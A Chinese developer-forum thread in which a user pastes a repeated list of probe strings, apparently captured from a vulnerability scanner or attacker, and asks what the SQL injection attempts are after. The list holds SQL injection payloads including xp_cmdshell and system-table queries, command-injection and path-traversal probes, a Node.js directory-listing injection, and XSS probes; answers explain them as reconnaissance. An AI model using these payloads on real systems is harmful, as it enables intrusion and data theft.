loda7023link
loda7023link
采纳率33.3%
2018-01-19 03:27

MySQL数据库大神进来看看,这一类SQL注入攻击的目的是什么,要获取我什么东西

5
已采纳
 "'
res.end(require('fs').readdirSync('.').toString())
res.end(require('fs').readdirSync('.').toString())
"Aryprobehb0004C6
Aryprobehb0004C6
ryprobehb0004C6
ryprobehb0004C6
\WEB-INF\web.xml
//….//WEB-INF/web.xml
\..\WEB-INF\web.xml
/../WEB-INF/web.xml
(select )
/WEB-INF/web.xml
 + ltrim('') + '
AVAK$(RETURN_CODE)OS
 || '' || '
;vol
||vol
 exec master..xp_cmdshell 'ver'-- 
%' and 'f%'='f
 and 'f'='f') -- 
" | "vol
 | 'vol
&&vol
 and 'f'='f
 and 'f'='f' -- 
|vol
)
\"
;
"


\'
#&<(,+">;
�' having 1=1--
) having 1=1--
; select * from sys.dba_users--
\' having 1=1--
; select * from dbo.sysdatabases--
; select * from master..sysmessages--
1 having 1=1--
; select @@version,1,1,1--
 having 1=1--
"

�' having 1=1-- 

) having 1=1-- 
\' having 1=1-- 
";SELECT 1;
1 having 1=1-- 
; select @@version,1,1,1-- 
;
 having 1=1-- 
; select * from sys.dba_users-- 
; select * from dbo.sysdatabases-- 
; select * from master..sysmessages-- 
ProbePhishing
WFXSSProbe
AB
"
WF'SQL"Probe;A--B
WFXSSProbe'")/>
\WEB-INF\web.xml
"Aryprobehb0004B5
\..\WEB-INF\web.xml
res.end(require('fs').readdirSync('.').toString())
/../WEB-INF/web.xml
res.end(require('fs').readdirSync('.').toString())
\"
"
res.end(require('fs').readdirSync('.').toString())
)
\..\WEB-INF\web.xml
 | 'vol
Aryprobehb0004B5
||vol
(select )
ryprobehb0004B5
;vol
AVAK$(RETURN_CODE)OS
"'
\"
 || '' || '
"'
ryprobehb0004B5
" | "vol
;vol
//….//WEB-INF/web.xml
/WEB-INF/web.xml
res.end(require('fs').readdirSync('.').toString())
\WEB-INF\web.xml
" | "vol
;
 + ltrim('') + '
)

\'
 + ltrim('') + '
 and 'f'='f') -- 
"
|vol
&&vol
/WEB-INF/web.xml

(select )
;
 | 'vol
%' and 'f%'='f
 exec master..xp_cmdshell 'ver'-- 

&&vol
%' and 'f%'='f
 and 'f'='f' -- 
#&<(,+">;
||vol
|vol
 and 'f'='f
#&<(,+">;
 exec master..xp_cmdshell 'ver'-- 
AVAK$(RETURN_CODE)OS
 and 'f'='f') -- 

//….//WEB-INF/web.xml
\'
/../WEB-INF/web.xml
 || '' || '
 and 'f'='f
 and 'f'='f' -- 
; select * from sys.dba_users--
\' having 1=1--
�' having 1=1--
) having 1=1--
1 having 1=1--
\' having 1=1--
�' having 1=1--
) having 1=1--
; select * from sys.dba_users--
; select * from dbo.sysdatabases--
; select * from master..sysmessages--
; select @@version,1,1,1--
; select @@version,1,1,1--
 having 1=1--
 having 1=1--
; select * from dbo.sysdatabases--
; select * from master..sysmessages--
1 having 1=1--
�' having 1=1-- 
"

"



�' having 1=1-- 
1 having 1=1-- 
";SELECT 1;
";SELECT 1;
) having 1=1-- 
) having 1=1-- 
\' having 1=1-- 
1 having 1=1-- 
\' having 1=1-- 
 having 1=1-- 
;
; select * from master..sysmessages-- 
; select @@version,1,1,1-- 
; select * from master..sysmessages-- 
 having 1=1-- 
;
; select @@version,1,1,1-- 
WFXSSProbe
; select * from dbo.sysdatabases-- 
; select * from sys.dba_users-- 
; select * from sys.dba_users-- 
; select * from dbo.sysdatabases-- 
WFXSSProbe
WF'SQL"Probe;A--B
ProbePhishing
"
"
WF'SQL"Probe;A--B
ProbePhishing
WFXSSProbe'")/>
AB
AB
WFXSSProbe'")/>

  • 点赞
  • 写回答
  • 关注问题
  • 收藏
  • 复制链接分享
  • 邀请回答

3条回答

  • caozhy 从今以后生命中的每一秒都属于我爱的人 3年前

    这里有很多试探,比如说试探你的数据库的表结构select * from sys.dba_users--,试探你的服务器的软件环境select @@version,1,1,1--
    试探你的程序是不是js拼接的sql(比如nodejs) + ltrim('') + '
    还有一些可能是针对某个特定web系统的漏洞,等等。

    点赞 1 评论 复制链接分享
  • joyosue joyingr 3年前

    邮箱地址吧。这种攻击的话

    点赞 评论 复制链接分享
  • qq_35963824 qq_35963824 3年前

    黑客想要获取你的用户名和密码

    点赞 评论 复制链接分享

相关推荐